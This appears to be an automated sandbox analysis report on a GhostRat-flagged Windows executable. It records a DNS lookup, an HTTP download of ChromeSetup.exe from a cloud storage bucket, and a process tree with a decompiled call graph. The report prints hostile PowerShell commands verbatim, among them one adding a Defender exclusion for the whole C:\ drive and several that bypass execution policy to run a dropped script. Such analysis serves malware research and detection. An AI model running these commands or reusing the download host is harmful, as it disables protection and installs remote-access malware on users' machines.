                                                                                                Jan 10, 2025 07:55:43.673242092 CET499869092192.168.2.98.217.85.20
                                                                                                Jan 10, 2025 07:55:51.133807898 CET499869092192.168.2.98.217.85.20
                                                                                                Jan 10, 2025 07:55:51.139250040 CET9092499868.217.85.20192.168.2.9
                                                                                                Jan 10, 2025 07:55:51.139291048 CET9092499868.217.85.20192.168.2.9
                                                                                                Jan 10, 2025 07:55:51.139344931 CET9092499868.217.85.20192.168.2.9
                                                                                                Jan 10, 2025 07:55:51.139372110 CET9092499868.217.85.20192.168.2.9
                                                                                                Jan 10, 2025 07:55:51.456346035 CET9092499868.217.85.20192.168.2.9
                                                                                                Jan 10, 2025 07:55:51.459264994 CET499869092192.168.2.98.217.85.20
                                                                                                Jan 10, 2025 07:55:51.464165926 CET9092499868.217.85.20192.168.2.9
                                                                                                Jan 10, 2025 07:55:59.698599100 CET499869092192.168.2.98.217.85.20
                                                                                                Jan 10, 2025 07:55:59.704199076 CET9092499868.217.85.20192.168.2.9
                                                                                                Jan 10, 2025 07:56:00.018421888 CET9092499868.217.85.20192.168.2.9
                                                                                                Jan 10, 2025 07:56:00.073396921 CET499869092192.168.2.98.217.85.20
                                                                                                Jan 10, 2025 07:56:00.169656038 CET499869092192.168.2.98.217.85.20
                                                                                                Jan 10, 2025 07:56:00.175154924 CET9092499868.217.85.20192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 07:52:07.235974073 CET | 65112 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 07:52:07.287940025 CET | 53 | 65112 | 1.1.1.1 | 192.168.2.9

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 07:52:07.235974073 CET | 192.168.2.9 | 1.1.1.1 | 0xe6c6 | Standard query (0) | jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 07:52:07.287940025 CET | 1.1.1.1 | 192.168.2.9 | 0xe6c6 | No error (0) | jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com | | 47.79.66.76 | A (IP address) | IN (0x0001) | false
                                                                                                • jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49751 | 47.79.66.76 | 443 | 7528 | C:\Users\user\Desktop\FIWszl1A8l.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 06:52:08 UTC | 146 | OUT | GET /ChromeSetup.exe HTTP/1.1
                                                                                                User-Agent: URLDownloader
                                                                                                Host: jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com
                                                                                                Cache-Control: no-cache
2025-01-10 06:52:09 UTC | 561 | IN | HTTP/1.1 200 OK
                                                                                                Server: AliyunOSS
                                                                                                Date: Fri, 10 Jan 2025 06:52:08 GMT
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Length: 10384768
                                                                                                Connection: close
                                                                                                x-oss-request-id: 6780C3980902553730FF7912
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: "8C6E8B9F0955CB1ACD92C7C43A8899ED"
                                                                                                Last-Modified: Sat, 28 Dec 2024 13:04:37 GMT
                                                                                                x-oss-object-type: Normal
                                                                                                x-oss-hash-crc64ecma: 590259998580795227
                                                                                                x-oss-storage-class: Standard
                                                                                                x-oss-ec: 0048-00000113
                                                                                                Content-Disposition: attachment
                                                                                                x-oss-force-download: true
                                                                                                Content-MD5: jG6LnwlVyxrNksfEOoiZ7Q==
                                                                                                x-oss-server-time: 3



                                                                                                Target ID:0
                                                                                                Start time:01:52:00
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\FIWszl1A8l.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:3'213'672 bytes
                                                                                                MD5 hash:F1C0A349EF488C9D2FDE3DD7F3C497BD
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:01:52:02
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:01:52:02
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:01:52:03
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:01:52:04
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff72d8c0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:01:52:06
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Users\user\AppData\Roaming\FIWszl1A8l.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\FIWszl1A8l.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:3'213'672 bytes
                                                                                                MD5 hash:F1C0A349EF488C9D2FDE3DD7F3C497BD
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.2570644353.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3537866824.0000000004173000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.1775024265.0000000004111000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3791271776.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3789481950.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.2571249345.0000000003F9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.1743428014.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.1775024265.0000000004142000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.2529901329.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3786854154.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 32%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Target ID:8
                                                                                                Start time:01:52:06
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:9
                                                                                                Start time:01:52:06
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:01:52:06
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:01:52:08
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:01:52:08
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:01:52:08
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:15
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:16
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:17
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:18
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:19
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:20
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:16.9%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:3.6%
                                                                                                  Total number of Nodes:1397
                                                                                                  Total number of Limit Nodes:7
11213->11214 11215 1000a6fa 11214->11215 11216 10002cb0 _invalid_parameter_noinfo_noreturn 11215->11216 11217 1000a709 11216->11217 11218 10002da0 8 API calls 11217->11218 11219 1000a721 _Smanip _Error_objects 11218->11219 11220 10012640 9 API calls 11219->11220 11221 1000a79a 11220->11221 11222 10005400 9 API calls 11221->11222 11223 1000a7b1 11222->11223 11224 10002e20 8 API calls 11223->11224 11225 1000a7fb 11224->11225 11226 10005250 13 API calls 11225->11226 11227 1000a807 11226->11227 11228 10002cd0 _invalid_parameter_noinfo_noreturn 11227->11228 11229 1000a82e 11228->11229 11230 10002cb0 _invalid_parameter_noinfo_noreturn 11229->11230 11231 1000a839 11230->11231 11232 10002cb0 _invalid_parameter_noinfo_noreturn 11231->11232 11233 1000a848 11232->11233 11234 10012620 _invalid_parameter_noinfo_noreturn 11233->11234 11235 1000a857 11234->11235 11236 10002cb0 _invalid_parameter_noinfo_noreturn 11235->11236 11237 1000a866 11236->11237 11471 100139a0 11237->11471 11241 1000a8ad 11242 10013a30 9 API calls 11241->11242 11243 1000a8db 11242->11243 11244 10013a30 9 API calls 11243->11244 11245 1000a909 11244->11245 11246 10013a30 9 API calls 11245->11246 11247 1000a937 11246->11247 11248 10013a30 9 API calls 11247->11248 11249 1000a965 11248->11249 11250 10013a30 9 API calls 11249->11250 11251 1000a993 11250->11251 11252 10013a30 9 API calls 11251->11252 11253 1000a9c1 11252->11253 11254 10013a30 9 API calls 11253->11254 11255 1000a9ef 11254->11255 11256 10013a30 9 API calls 11255->11256 11257 1000aa1d 11256->11257 11258 10013a30 9 API calls 11257->11258 11259 1000aa4b 11258->11259 11260 10013a30 9 API calls 11259->11260 11261 1000aa79 11260->11261 11262 10002cb0 _invalid_parameter_noinfo_noreturn 11261->11262 11263 1000aa8b 11262->11263 11264 10002cb0 _invalid_parameter_noinfo_noreturn 11263->11264 11265 1000aa9a 11264->11265 11266 10002cb0 _invalid_parameter_noinfo_noreturn 11265->11266 11267 1000aaa9 11266->11267 11268 10002cb0 _invalid_parameter_noinfo_noreturn 
11267->11268 11269 1000aab8 11268->11269 11270 10002cb0 _invalid_parameter_noinfo_noreturn 11269->11270 11271 1000aac7 11270->11271 11272 10002cb0 _invalid_parameter_noinfo_noreturn 11271->11272 11273 1000aad6 11272->11273 11274 10002cb0 _invalid_parameter_noinfo_noreturn 11273->11274 11275 1000aae5 11274->11275 11276 10002cb0 _invalid_parameter_noinfo_noreturn 11275->11276 11277 1000aaf4 11276->11277 11278 10002cb0 _invalid_parameter_noinfo_noreturn 11277->11278 11279 1000ab03 11278->11279 11280 10002cb0 _invalid_parameter_noinfo_noreturn 11279->11280 11281 1000ab12 11280->11281 11282 10002cb0 _invalid_parameter_noinfo_noreturn 11281->11282 11283 1000ab21 11282->11283 11284 10005520 DeleteFileA 11283->11284 11285 1000ab33 11284->11285 11286 10002da0 8 API calls 11285->11286 11287 1000ab4d 11286->11287 11288 10005300 31 API calls 11287->11288 11289 1000ab64 11288->11289 11290 10002cb0 _invalid_parameter_noinfo_noreturn 11289->11290 11291 1000ab76 Sleep 11290->11291 11292 1000ab8e _Smanip _Error_objects 11291->11292 11293 10012640 9 API calls 11292->11293 11294 1000addd 11293->11294 11295 10005400 9 API calls 11294->11295 11296 1000adf4 _Smanip _Error_objects 11295->11296 11297 10012640 9 API calls 11296->11297 11298 1000ae9a 11297->11298 11299 10005400 9 API calls 11298->11299 11300 1000aeb1 11299->11300 11301 10013890 9 API calls 11300->11301 11302 1000aef0 11301->11302 11303 10002cb0 _invalid_parameter_noinfo_noreturn 11302->11303 11304 1000af02 11303->11304 11305 10012620 _invalid_parameter_noinfo_noreturn 11304->11305 11306 1000af11 11305->11306 11307 10002cb0 _invalid_parameter_noinfo_noreturn 11306->11307 11308 1000af20 11307->11308 11309 10012620 _invalid_parameter_noinfo_noreturn 11308->11309 11310 1000af2f 11309->11310 11311 1000af3d WinExec Sleep 11310->11311 11312 1000af5b _Smanip _Error_objects 11311->11312 11313 10012640 9 API calls 11312->11313 11314 1000b07c 11313->11314 11315 10005400 9 API calls 11314->11315 11316 1000b093 11315->11316 11317 
10012620 _invalid_parameter_noinfo_noreturn 11316->11317 11318 1000b0a5 _Smanip _Error_objects 11317->11318 11319 10012640 9 API calls 11318->11319 11320 1000b118 11319->11320 11321 10005400 9 API calls 11320->11321 11322 1000b12f 11321->11322 11323 10003bc0 10 API calls 11322->11323 11324 1000b162 11323->11324 11325 10003b90 10 API calls 11324->11325 11326 1000b1a1 11325->11326 11327 10002cd0 _invalid_parameter_noinfo_noreturn 11326->11327 11328 1000b1bc 11327->11328 11329 10002cb0 _invalid_parameter_noinfo_noreturn 11328->11329 11330 1000b1c7 11329->11330 11331 10002cb0 _invalid_parameter_noinfo_noreturn 11330->11331 11332 1000b1d6 11331->11332 11333 10002cb0 _invalid_parameter_noinfo_noreturn 11332->11333 11334 1000b1e5 11333->11334 11335 10012620 _invalid_parameter_noinfo_noreturn 11334->11335 11336 1000b1f4 memset 11335->11336 11337 10002b60 11336->11337 11338 1000b245 ShellExecuteExA 11337->11338 11339 1000b270 11338->11339 11340 1000b29b 11338->11340 11342 1000b296 11339->11342 11343 1000b279 WaitForSingleObject CloseHandle 11339->11343 11341 10002cb0 _invalid_parameter_noinfo_noreturn 11340->11341 11345 1000b2b4 11341->11345 11344 1000b3a3 Sleep 11342->11344 11399 1000b548 11342->11399 11343->11342 11346 1000b3ba 11344->11346 11347 10002cb0 _invalid_parameter_noinfo_noreturn 11345->11347 11349 10002da0 8 API calls 11346->11349 11348 1000b2c3 11347->11348 11350 10002cb0 _invalid_parameter_noinfo_noreturn 11348->11350 11351 1000b3c6 11349->11351 11352 1000b2d2 11350->11352 11480 10005740 11351->11480 11354 10002cb0 _invalid_parameter_noinfo_noreturn 11352->11354 11356 1000b2e1 11354->11356 11355 1000b3d6 11357 10002cb0 _invalid_parameter_noinfo_noreturn 11355->11357 11358 10002cb0 _invalid_parameter_noinfo_noreturn 11356->11358 11359 1000b3e8 11357->11359 11360 1000b2f0 11358->11360 11364 10002da0 8 API calls 11359->11364 11361 10002cb0 _invalid_parameter_noinfo_noreturn 11360->11361 11362 1000b2ff 11361->11362 11363 10002cb0 
_invalid_parameter_noinfo_noreturn 11362->11363 11365 1000b30e 11363->11365 11366 1000b400 11364->11366 11367 10002cb0 _invalid_parameter_noinfo_noreturn 11365->11367 11368 10005740 SetFileAttributesA 11366->11368 11369 1000b31d 11367->11369 11370 1000b410 11368->11370 11372 10002cb0 _invalid_parameter_noinfo_noreturn 11369->11372 11371 10002cb0 _invalid_parameter_noinfo_noreturn 11370->11371 11373 1000b422 11371->11373 11374 1000b32c 11372->11374 11377 10005520 DeleteFileA 11373->11377 11375 10002cb0 _invalid_parameter_noinfo_noreturn 11374->11375 11376 1000b33b 11375->11376 11378 10002cb0 _invalid_parameter_noinfo_noreturn 11376->11378 11379 1000b434 11377->11379 11380 1000b34a 11378->11380 11383 10005520 DeleteFileA 11379->11383 11381 10002cb0 _invalid_parameter_noinfo_noreturn 11380->11381 11382 1000b359 11381->11382 11384 10012620 _invalid_parameter_noinfo_noreturn 11382->11384 11385 1000b448 11383->11385 11386 1000b368 11384->11386 11387 10002cb0 _invalid_parameter_noinfo_noreturn 11385->11387 11388 10012620 _invalid_parameter_noinfo_noreturn 11386->11388 11389 1000b464 11387->11389 11390 1000b377 11388->11390 11392 10002cb0 _invalid_parameter_noinfo_noreturn 11389->11392 11391 10002cb0 _invalid_parameter_noinfo_noreturn 11390->11391 11393 1000b386 11391->11393 11394 1000b473 11392->11394 11395 10002cb0 _invalid_parameter_noinfo_noreturn 11393->11395 11396 10002cb0 _invalid_parameter_noinfo_noreturn 11394->11396 11395->11342 11397 1000b482 11396->11397 11398 10002cb0 _invalid_parameter_noinfo_noreturn 11397->11398 11400 1000b491 11398->11400 11401 10002cb0 _invalid_parameter_noinfo_noreturn 11400->11401 11402 1000b4a0 11401->11402 11403 10002cb0 _invalid_parameter_noinfo_noreturn 11402->11403 11404 1000b4af 11403->11404 11405 10002cb0 _invalid_parameter_noinfo_noreturn 11404->11405 11406 1000b4be 11405->11406 11407 10002cb0 _invalid_parameter_noinfo_noreturn 11406->11407 11408 1000b4cd 11407->11408 11409 10002cb0 _invalid_parameter_noinfo_noreturn 
11408->11409 11410 1000b4dc 11409->11410 11411 10002cb0 _invalid_parameter_noinfo_noreturn 11410->11411 11412 1000b4eb 11411->11412 11413 10002cb0 _invalid_parameter_noinfo_noreturn 11412->11413 11414 1000b4fa 11413->11414 11415 10002cb0 _invalid_parameter_noinfo_noreturn 11414->11415 11416 1000b509 11415->11416 11417 10012620 _invalid_parameter_noinfo_noreturn 11416->11417 11418 1000b518 11417->11418 11419 10012620 _invalid_parameter_noinfo_noreturn 11418->11419 11420 1000b527 11419->11420 11421 10002cb0 _invalid_parameter_noinfo_noreturn 11420->11421 11422 1000b536 11421->11422 11423 10002cb0 _invalid_parameter_noinfo_noreturn 11422->11423 11423->11399 11425 1000500a 11424->11425 11483 100125c0 11425->11483 11428 10005028 11430 100050db _Error_objects 11428->11430 11499 10012600 11428->11499 11489 100137c0 11430->11489 11431 100050f7 11434 10012600 9 API calls 11431->11434 11432 1000512c 11435 10012600 9 API calls 11432->11435 11434->11430 11437 1000515c 11435->11437 11436 100051dd 11493 10004ee0 MultiByteToWideChar 11436->11493 11438 10012600 9 API calls 11437->11438 11439 1000518a 11438->11439 11441 100051ef 11442 10002da0 8 API calls 11441->11442 11443 10005201 _MallocaArrayHolder 11442->11443 11444 10002cb0 _invalid_parameter_noinfo_noreturn 11443->11444 11445 1000522b 11444->11445 11446 10012620 _invalid_parameter_noinfo_noreturn 11445->11446 11447 1000523a 11446->11447 11447->11160 11449 10005280 11448->11449 11451 100052c2 11449->11451 11561 10012780 11449->11561 11565 100129e0 11449->11565 11452 10002cb0 _invalid_parameter_noinfo_noreturn 11451->11452 11454 100052e6 11452->11454 11454->11182 11626 100143c0 11455->11626 11457 100138e9 11457->11188 11459 10005531 11458->11459 11459->11194 11669 100124a0 11460->11669 11463 100053a7 11678 100053d0 11463->11678 11465 100053b9 11465->11199 11466 10005357 11467 1000536f ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 11466->11467 11673 10012400 11467->11673 11469 10005395 11470 1000539f 
SetFileAttributesA 11469->11470 11470->11463 11472 100139b5 HandleT Concurrency::task_continuation_context::task_continuation_context 11471->11472 11473 100139e5 11472->11473 11772 10001410 ?_Xlength_error@std@@YAXPBD 11472->11772 11764 100146c0 11473->11764 11476 1000a87f 11477 10013a30 11476->11477 11478 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 11477->11478 11479 10013a48 11478->11479 11479->11241 11481 10002b60 11480->11481 11482 10005750 SetFileAttributesA 11481->11482 11482->11355 11484 100125cf 11483->11484 11485 100125e6 11484->11485 11488 100125f3 11484->11488 11502 10013090 ?_Xlength_error@std@@YAXPBD 11484->11502 11503 10013b70 11485->11503 11488->11428 11490 100137f5 HandleT 11489->11490 11492 10013832 _Error_objects 11490->11492 11519 10014ab0 11490->11519 11492->11436 11540 10016360 11493->11540 11495 10004f1b memset MultiByteToWideChar WideCharToMultiByte 11496 10016360 11495->11496 11497 10004f7e memset WideCharToMultiByte 11496->11497 11498 10004fc2 _MallocaArrayHolder 11497->11498 11498->11441 11541 10013c60 11499->11541 11501 100050c9 11501->11430 11501->11431 11501->11432 11502->11485 11504 10013b9d Concurrency::task_continuation_context::task_continuation_context 11503->11504 11505 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11504->11505 11506 10013bcf 11505->11506 11511 10014bd0 11506->11511 11512 10014bf4 HandleT 11511->11512 11513 100152a0 memcpy 11512->11513 11514 10013bf5 11513->11514 11515 100142f0 11514->11515 11517 10014301 _Error_objects Concurrency::task_continuation_context::task_continuation_context 11515->11517 11516 10013c42 11516->11488 11517->11516 11518 10003a90 allocator _invalid_parameter_noinfo_noreturn 11517->11518 11518->11516 11520 10014adc Concurrency::task_continuation_context::task_continuation_context 11519->11520 11523 10014b1c Concurrency::task_continuation_context::task_continuation_context 11520->11523 11529 10001410 
